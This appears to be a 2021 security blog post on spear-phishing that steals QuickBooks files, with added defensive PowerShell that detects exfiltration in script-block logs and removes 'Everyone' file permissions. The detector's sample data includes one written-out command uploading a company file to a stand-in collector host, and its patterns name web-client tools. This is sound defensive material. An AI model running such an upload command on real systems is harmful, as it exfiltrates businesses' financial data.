Thursday 25th February 2021

BLOG: Increase in QuickBooks Data Spear-Phishing Attacks

Researchers have identified a significant surge in the theft of QuickBooks file data, with social engineering used to distribute the malware and abuse the accounting software. QuickBooks is an accounting software package developed and marketed by Intuit.

The attacks have frequently used basic malware that is often code-signed, which makes it harder to detect with antivirus or other threat-protection software. One form of the spear-phishing attack is a PowerShell command that runs from within the email itself, researchers said. A second vector uses lure documents sent by email that run a macro when opened; the macro downloads malicious code, which then uploads QuickBooks files to an attacker-controlled server.

Threat actors have also been seen running the PowerShell cmdlet Invoke-WebRequest on target systems to upload the relevant data to the Internet, with no need to download specialised malware at all.

Researchers found that once a user has access to the QuickBooks database, malware or a malicious PowerShell script running as that user can read the company file from the file server, whether or not the user is an administrator.
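The upload technique described above leaves a trace in PowerShell script block logging (event 4104 in the Microsoft-Windows-PowerShell/Operational log) when that logging is enabled. The following is an added example, not code from the original post or from Intuit, that scores a script block on three independent signals (a web client cmdlet, an upload-style parameter, and a QuickBooks file reference) and only flags a block when all three are present, so routine inventory of .qbw files or ordinary downloads do not alert. It assumes script block logging is turned on and that the ScriptBlockText is the third property of event 4104; the sample blocks at the end are constructed for the demonstration.

```powershell
function Test-QbExfilScriptBlock {
    param([Parameter(Mandatory)][AllowEmptyString()][string]$ScriptBlockText)
    # Three independent signals; a block is flagged only when all three fire.
    # PowerShell's -match is case-insensitive, so no (?i) is needed.
    $signals = [ordered]@{
        WebClient  = '\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget)\b|System\.Net\.WebClient'
        Upload     = '-Method\s+Post\b|-InFile\b|-Body\b|\.Upload(File|Data|String)\('
        QuickBooks = '\.(qbw|qbb|tlg)\b|QuickBooks|Intuit'
    }
    $hits = @(foreach ($s in $signals.GetEnumerator()) {
        if ($ScriptBlockText -match $s.Value) { $s.Key }
    })
    [pscustomobject]@{
        Suspicious = ($hits.Count -eq $signals.Count)
        Indicators = ($hits -join ',')
    }
}

function Get-QbExfilEvents {
    # Pull recent 4104 events and run the scoring over each logged script block.
    # Assumption: script block logging is enabled; Properties[2] holds ScriptBlockText.
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text   = [string]$_.Properties[2].Value
            $result = Test-QbExfilScriptBlock -ScriptBlockText $text
            if ($result.Suspicious) {
                [pscustomobject]@{
                    Time       = $_.TimeCreated
                    Indicators = $result.Indicators
                    Snippet    = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
            }
        }
}

# Constructed sample script blocks (not real log data) to show how the scoring behaves:
$samples = @(
    "Get-ChildItem 'C:\Users\Public\Documents\Intuit\QuickBooks' -Filter *.qbw",               # inventory only
    "iwr -Uri 'https://collector.example.invalid/u' -Method Post -InFile 'C:\QB\company.qbw'",  # all three signals
    "Invoke-WebRequest -Uri 'https://updates.example.invalid/x.zip' -OutFile x.zip"              # download only
)
$samples | ForEach-Object { Test-QbExfilScriptBlock -ScriptBlockText $_ } | Format-Table -AutoSize
```

Run `Get-QbExfilEvents` on a host to review the live log; only the second constructed sample is reported as suspicious. The three-signal rule is deliberately conservative; an analyst who wants to see weaker matches can drop to two of three by changing the `Suspicious` comparison.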

Furthermore, the attack surface increases sharply if QuickBooks file permissions are set to the “Everyone” group, because an attacker can then target any individual in the company rather than a specific person with the right privileges.

In addition to selling the stolen data on the dark web, the actor behind the attacks has in some instances used bait-and-switch tactics, posing as suppliers or partners to lure customers into making fraudulent bank transfers.

Users need to stay vigilant and aware of these attacks. Make sure file permissions are not set to the “Everyone” group, to limit exposure, and if you use the QuickBooks Database Server Manager, check the permissions again after running a database repair and confirm they are locked down.
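The permission check in the two paragraphs above can be scripted. The following is an added example, not code from the original post or from Intuit, that walks a folder of QuickBooks files, reports every Allow entry granted to the built-in Everyone group (matched by its well-known SID S-1-1-0 rather than its display name, so it works on non-English systems), and can optionally remove explicit Everyone entries. It assumes the company files live under the given root and use the .qbw, .qbb, .tlg and .nd extensions; the default path is an assumption and should be replaced with the share the Database Server Manager hosts.

```powershell
function Get-QbEveryoneAccess {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory)][string]$Root,
        [string[]]$Include = @('*.qbw', '*.qbb', '*.tlg', '*.nd'),   # assumed QuickBooks file types
        [switch]$Remediate
    )
    $everyoneSid = 'S-1-1-0'   # well-known SID of the Everyone group

    Get-ChildItem -Path $Root -Recurse -File -Include $Include -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            $acl  = Get-Acl -LiteralPath $file.FullName
            # Ask for the rules keyed by SID so the comparison does not depend on locale
            $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
            foreach ($rule in $rules) {
                if ($rule.IdentityReference.Value -ne $everyoneSid) { continue }
                if ($rule.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }

                $finding = [pscustomobject]@{
                    Path      = $file.FullName
                    Rights    = $rule.FileSystemRights.ToString()
                    Inherited = $rule.IsInherited
                    Action    = 'Reported'
                }
                if ($Remediate) {
                    if ($rule.IsInherited) {
                        # An inherited ACE cannot be removed on the file; the parent folder must be fixed
                        $finding.Action = 'Inherited from parent folder; fix the folder ACL'
                    }
                    elseif ($PSCmdlet.ShouldProcess($file.FullName, 'Remove Everyone:Allow ACE')) {
                        $acl.RemoveAccessRuleAll($rule)
                        Set-Acl -LiteralPath $file.FullName -AclObject $acl
                        $finding.Action = 'Removed'
                    }
                }
                $finding
            }
        }
}

# Report only (assumed default location of the company files):
Get-QbEveryoneAccess -Root 'C:\Users\Public\Documents\Intuit\QuickBooks' | Format-Table -AutoSize

# Dry run of the cleanup against a share; drop -WhatIf to apply it:
Get-QbEveryoneAccess -Root '\\fileserver\QuickBooks' -Remediate -WhatIf
```

Removing the Everyone entry should be paired with granting the specific accounting group that actually needs the files, otherwise legitimate users lose access. Findings marked as inherited point at a folder-level grant, which is the common cause after a Database Server Manager repair resets permissions, so re-run the report after any repair.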
